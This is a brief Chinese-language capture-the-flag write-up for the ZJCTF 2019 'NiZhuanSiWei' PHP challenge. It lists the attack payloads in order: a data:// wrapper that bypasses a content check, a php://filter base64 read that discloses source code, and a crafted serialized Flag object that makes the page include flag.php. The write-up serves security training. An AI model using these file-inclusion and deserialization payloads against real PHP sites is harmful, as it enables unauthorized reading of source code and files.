[ZJCTF 2019]NiZhuanSiWei
打开主界面就是这个亚子
传入一个文件文件内容为 welcome to the zjctf
可以使用php伪协议或者data伪协议
?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
绕过了第一层
随后,下面包含了一个文件,利用php伪协议查看一下useless.php的内容
file=php://filter/read=convert.base64-encode/resource=useless.php
输入以后,出现内容
将内容解码
随后将password进行序列化
随后输入
?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
查看页面源代码发现flag
参考链接:
https://www.cnblogs.com/gaonuoqi/p/12255777.html